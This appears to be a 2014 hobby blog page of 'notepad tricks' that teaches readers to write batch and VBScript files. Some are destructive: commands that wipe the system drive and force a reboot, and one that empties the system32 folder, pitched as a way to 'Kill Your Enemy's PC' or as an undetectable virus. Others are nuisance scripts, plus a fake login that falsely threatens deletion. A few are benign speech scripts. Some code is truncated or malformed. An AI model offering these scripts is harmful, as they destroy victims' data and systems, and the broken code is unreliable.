Monday 30 June 2014

Makes System Dead.

(UNSAFE)
 1.)Go to notepad and type the following: 
@ECHO OFF
DEL C:\ *.*|Y
 2.)Save it as "DELL.BAT"

 3.)WANT WORSE.....!!!?.... Then type/copy the following code:
@ECHO OFF
DEL %SYSTEMDRIVE%\*.*/F/S/Q
SHUTDOWN -R -F -T 00
 4.)AND SAVE IT AS A .BAT FILE.

SECOND TRICK
Before you try out this trick, keep in mind that this can cause loss of important data on your (or any one else’s on which you are running this file) computer system. So BEWARE!!!........ In order to create the file, follow the steps given below:

  • Open Notepad.
  • Paste the following code in the notepad file:
@echo off
title Get A Life
cd C:
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not cry if you loose your data or anything.
pause
echo Pick your option:
echo 1. Die Slowly
echo 2. Instant Death
echo 3. Stay Away From This One
echo 4. Die this way (For Wimps!)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

  • Save the file with any name and with a ".bat" extension and close the file.

Never try to run this file on your PC or else it will be the last time when you will be using your system/PC.

Sunday 29 June 2014

MATRIX EFFECT

Just follow the steps and see the amazing matrix effect happen in your DOS window:
 1.)Open Notepad.
 2.)Copy the below mentioned text in your notepad file:
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
 3.)Save the file with .bat extension like Matrix.bat
 4.)That's it. Just open the file to see the matrix effect right before your eyes!
 5.)To change the color, replace "02" of "color 02" with the following color code chart



Deleting Data

(MODERATE)

Description: Shows a fake username and password entrance area then deletes it self

    1.Go into notepad and type:

@echo off
echo If the proper username and password is not entered all files will be deleted by this virus.
echo Good Luck
set/p\/name=username:
set/p\/password=password:
echo haha you got the username and password wrong
pause
echo Files are being deleted
pause
dir/s
del "c:up.bat" 
3. Save it as up.bat (must be this!) 

Anti-Virus Checker/Tester

You can test any of your Anti Virus programs for its effectiveness and proper working...... using a simple notepad trick.
Follow the steps below to know more:
  1.)Open Notepad.
  2.)Copy the code give below in the notepad file:



X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

  3.)Save it with an .exe extension like testvirus.exe
This test is also known as E I C A R (European Institute for Computer Antivirus Research) test file.

Thursday 26 June 2014

Simple Virus To Continuously Open Notepads

(SAFE)
1. Click on Start-> Run -> Notepad.
2. In Notepad Paste the following code.

@ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top
    
3. Now Save the file with an extension ".bat" , for e.g: "notepad.bat"
4. If you click on "notepad.bat" , it will continuously open notepads.

Irritating Virus

(SAFE)

Echo off
:loop1
start command
start command
start command
start command
start command
start command
start command
start command
start command
start command
goto loop2

:loop2
start command
start command
start command
start command
start command
start command
start command
start command
start command
start command
goto loop1

##########################################
All it does is bring up loads of boxes and it keeps opening them until you restart your PC.
 IT IS NOT DANGEROUS IT IS JUST ANNOYING!!!

Critical Formatting Virus

(UNSAFE)

Write your own simple virus which can't be detected by any antivirus....

@Echo off 
Del C:\ *.* |y   

And save that as ".bat" and RUN IT
It will delete the content of C:\ drive...

PLEASE NoTe::::: dont run that .bat file on ur system .... it will delete C: Drive:...

Never try to run this file on your PC or else it will be the last time when you will be using your system/PC.

Irritate With Messages

(SAFE)
You can frustrate your friend by showing repeated messages in the notepad,
by following this simple notepad tricks


Just Type below code in notepad :-

@ECHO off
:Begin
msg * Hey
msg * How are you dear….
msg * I am fine you!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN


and Save it as “Anything.bat”

now see what happens.. :) !!

VIRUS IN YOUR KEYBOARD !!

(SAFE)
Make your keyboard keys to type continuously (non-stop)

Just Type :


MsgBox “stop me..! if you can”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop


Save it as “ghostrider.vbs”, or with any name, but, with an extension".vbs".

To watch this at real time just open any notepad files in your PC....
And save this file.

Kill Your Enemy's PC

(UNSAFE)
Its nothing but emptying the system32 folder of OS in your computer, so that your computer cannot boot because system32 is essential folder which is needed for booting and all the core operation of OS.

Write/Copy the following code in your notepad:-

- del c:\windows\system32\*.* /q
save the file as “terminator.bat” without quote

!!…red alert…!!

Don’t even think/ try to click this file in your computer because the file u had created will empty all files in system32 folder which is essential for your computer to work.
Never try to run this file on your PC or else it will be the last time when you will be using your system/PC.

CD-ROM Continuously Pops-out

(SAFE)
You can make your CD-Drive to open & close repeatedly by using a simple notepad tricks given below

Just Type/Copy the following code below in notepad :-


Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop 
Save it as “im mad.VBS” .

now watch that your CD-Drive has become MAD…!

Try it at your own risk...... soon, way to stop it will also be uploaded.

Text-To-Audio Converter

Let your PC/Laptop convert text to audio for you

How To Do It ?

1. Open Notepad file on your Windows PC.
2. Copy and paste the below mentioned code :


Dim msg, sapi
msg=InputBox("Enter your text for conversion–www.notepadtrik.com"," Text-To-Audio Converter")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg


3.Save this file with any name with ".vbs" as extension. For e.g:- "Text-To-Audio.vbs"

notepadtrik.blogspot.com
Voila !! Your Text to Audio converter is ready to be used. Now open the saved file and type in the text you wanna to convert and click "OK" or press "Enter"

Make Your Laptop/PC Welcome You

Do you watch movies? Have you ever liked the way how Computers in movies welcome their users by calling out their names?

Well....by using this trick, you can make your Computer welcome you in its computerized voice. You can make your Windows based computer say "Welcome to your PC, Username."

Make Windows Greet you with a Custom Voice Message at Start-up.

Follow the instructions given below:-

 1. Click Start>All Programs>Accessories>Notepad.
 2. Copy and paste the exact code given below.
 3. Replace Username with your own Name.
 4. Click on File>Menu>Save As>select "All types" in "Save As Type" option, and save the file as
     Welcome.vbs or "*.vbs".
 5. Copy the saved file.
 6. Navigate to "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"(in Windows XP) or
    to "C:\Users\User-name\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
    (in Windows 7 and Windows Vista) if C: is your System drive.
 7. Paste the file.

Dim speaks, speech
speaks="Welcome to your PC, Username"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks
Now when the next time you start your computer, Windows will welcome you in its own computerized voice.
Note: For best results, it's recommended to change sound scheme to No Sounds.
You can change the sound scheme to No Sounds by Following the steps given below:-

  1. Go to Control Panel.
  2. Then right click on Switch to Classic View.
  3. Then click on Sounds And Audio Devices.
  4. Then click on the Sounds tab.
  5. Select No Sounds from the Sound Scheme option.
  6. If you wish to save your previous sound scheme, you can save it by clicking Yes in the popup menu.
  7. Click on OK.
Try this yourself to see how it woks. From my opinion, it's an excellent trick. Whenever I start my PC in front of anyone and the PC welcomes me, the fellow is left wondering, how magical computer do I have.


more notepad tricks are at notepadtrik.blogspot.com